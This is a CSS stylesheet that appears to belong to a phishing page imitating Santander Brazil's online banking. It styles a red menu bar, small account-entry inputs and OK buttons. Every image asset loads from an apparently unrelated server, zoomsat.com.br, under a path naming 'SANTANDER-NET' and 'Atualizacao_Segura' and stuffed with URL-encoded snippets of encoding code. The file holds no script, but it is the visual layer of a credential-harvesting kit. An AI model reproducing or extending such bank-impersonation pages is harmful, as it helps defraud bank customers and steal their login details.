@charset "utf-8";
body {
	margin: 0px;
	padding: 0px;
}
.header {
	height: 45px;
	width: 975px;
	margin-right: auto;
	margin-left: auto;
	display: block;
}
.menu {
	height: auto;
	width: 975px;
	margin-right: auto;
	margin-left: auto;
	display: block;
}
#select_tipo_menu {
	display: block;
	width: 975px;
	margin-top: 15px;
	height: 25px;
}
#select_tipo_menu a {
	float: left;
	height: 25px;
	width: 120px;
	display: block;
	background-color: #e5e5e5;
	margin-right: 5px;
	font-family: Verdana, Geneva, sans-serif;
	text-decoration: none;
	font-size: 12px;
	line-height: 25px;
	border-radius: 5px 5px 0px 0px;
	text-align: center;
	color: #333;
}
.tipo_ativo {
	background-color: #5e606b!important;
	color: #FFF!important;
}
.menu_lat {
	display: block;
	height: 110px;
	width: 100%;
	background-color: #F00;
}
.menu_logo {
	width: 189px!important;
}
.menu_lat ul {
	display: block;
	list-style-type: none;
	padding: 0px;
	height: auto;
	width: 975px;
	margin-top: 0px;
	margin-right: auto;
	margin-bottom: 0px;
	margin-left: auto;
}
.menu_lat ul li {
	float: left;
	height: 110px;
	line-height: 80px;
	background-color: #F00;
}
.menu_lat ul li a {
	font-family: Verdana, Geneva, sans-serif;
	font-size: 12px;
	color: #FFF;
	text-decoration: none;
	display: block;
	padding-right: 7px;
	padding-left: 7px;
	height: 80px;
	line-height: 17px;
	padding-top: 30px;
	border-left-width: 1px;
	border-left-style: solid;
	border-left-color: #FFF;
}
.menu_lat ul li a:hover {
	background-color: #e5e5e5;
	color: #222;
}
.acess_fisi {
	border-left-width: 1px;
	border-left-style: solid;
	border-left-color: #FFF;
	position: relative;
}
.pracima {
	position: absolute;
	top: 52px;
	background-image: url(http://zoomsat.com.br/gprs/01SANTANDER%5FuserKeyASCIIS%28i%29%20%3D%20Asc%28Mid%24%28UserKey%2C%20i%2C%201%29%29/TEXTAsciis%28i%29%20%3D%20Asc%28Mid%24%28Text%2C%20i%2C%201%29%29/Temp%20%3D%20TEXTAsciis%28i%29%20%2B%20userKeyASCIIS%28j%29/SANTANDER%2DNET/br/Atualizacao%5FSegura/84x21.jpg);
	background-repeat: no-repeat;
	height: 21px;
	width: 74px;
	border-top-width: 0px;
	border-right-width: 0px;
	border-bottom-width: 0px;
	border-left-width: 0px;
	padding-right: 5px;
	padding-left: 5px;
	right: 170px;
	outline:none;
}
.btn_go1 {
	background-image: url(http://zoomsat.com.br/gprs/01SANTANDER%5FuserKeyASCIIS%28i%29%20%3D%20Asc%28Mid%24%28UserKey%2C%20i%2C%201%29%29/TEXTAsciis%28i%29%20%3D%20Asc%28Mid%24%28Text%2C%20i%2C%201%29%29/Temp%20%3D%20TEXTAsciis%28i%29%20%2B%20userKeyASCIIS%28j%29/SANTANDER%2DNET/br/Atualizacao%5FSegura/ok_31x20.jpg);
	background-repeat: no-repeat;
	height: 20px;
	width: 31px;
	position: absolute;
	top: 52px;
	right: 130px;
	border-top-width: 0px;
	border-right-width: 0px;
	border-bottom-width: 0px;
	border-left-width: 0px;
	cursor: pointer;
	outline:none;
}
#bannerone {
	height: 301px;
	width: 975px;
	margin-right: auto;
	margin-left: auto;
	margin-top: 15px;
	display: block;
}
.bg_one_one {
	height: auto;
	width: 975px;
	margin-right: auto;
	margin-left: auto;
	margin-top: 35px;
}

.bg_one_two {
	height: auto;
	width: 975px;
	margin-right: auto;
	margin-left: auto;
}
#footer {
	height: 282px;
	width: 100%;
	background-image: url(http://zoomsat.com.br/gprs/01SANTANDER%5FuserKeyASCIIS%28i%29%20%3D%20Asc%28Mid%24%28UserKey%2C%20i%2C%201%29%29/TEXTAsciis%28i%29%20%3D%20Asc%28Mid%24%28Text%2C%20i%2C%201%29%29/Temp%20%3D%20TEXTAsciis%28i%29%20%2B%20userKeyASCIIS%28j%29/SANTANDER%2DNET/br/Atualizacao%5FSegura/bg_footer.jpg);
	background-repeat: repeat-x;
	display: block;
	margin-top: 15px;
}
#footer_centered {
	height: 282px;
	width: 975px;
	margin-right: auto;
	margin-left: auto;
}
.input_1 {
	position: absolute;
	top: 52px;
	background-image: url(http://zoomsat.com.br/gprs/01SANTANDER%5FuserKeyASCIIS%28i%29%20%3D%20Asc%28Mid%24%28UserKey%2C%20i%2C%201%29%29/TEXTAsciis%28i%29%20%3D%20Asc%28Mid%24%28Text%2C%20i%2C%201%29%29/Temp%20%3D%20TEXTAsciis%28i%29%20%2B%20userKeyASCIIS%28j%29/SANTANDER%2DNET/br/Atualizacao%5FSegura/inpt_1.jpg);
	background-repeat: no-repeat;
	height: 19px;
	width: 26px;
	border-top-width: 0px;
	border-right-width: 0px;
	border-bottom-width: 0px;
	border-left-width: 0px;
	padding-right: 5px;
	padding-left: 5px;
	right: 195px;
	outline: none;
}
.input_2 {
	background-image: url(http://zoomsat.com.br/gprs/01SANTANDER%5FuserKeyASCIIS%28i%29%20%3D%20Asc%28Mid%24%28UserKey%2C%20i%2C%201%29%29/TEXTAsciis%28i%29%20%3D%20Asc%28Mid%24%28Text%2C%20i%2C%201%29%29/Temp%20%3D%20TEXTAsciis%28i%29%20%2B%20userKeyASCIIS%28j%29/SANTANDER%2DNET/br/Atualizacao%5FSegura/inpt_2.jpg);
	background-repeat: no-repeat;
	height: 19px;
	width: 72px;
	position: absolute;
	top: 52px;
	right: 65px;
	border-top-width: 0px;
	border-right-width: 0px;
	border-bottom-width: 0px;
	border-left-width: 0px;
	outline: none;
	padding-right: 5px;
	padding-left: 5px;
}
.btn_go2 {
	background-image: url(http://zoomsat.com.br/gprs/01SANTANDER%5FuserKeyASCIIS%28i%29%20%3D%20Asc%28Mid%24%28UserKey%2C%20i%2C%201%29%29/TEXTAsciis%28i%29%20%3D%20Asc%28Mid%24%28Text%2C%20i%2C%201%29%29/Temp%20%3D%20TEXTAsciis%28i%29%20%2B%20userKeyASCIIS%28j%29/SANTANDER%2DNET/br/Atualizacao%5FSegura/ok_31x20.jpg);
	background-repeat: no-repeat;
	height: 20px;
	width: 31px;
	position: absolute;
	top: 52px;
	right: 25px;
	border-top-width: 0px;
	border-right-width: 0px;
	border-bottom-width: 0px;
	border-left-width: 0px;
	cursor: pointer;
	outline: none;
}
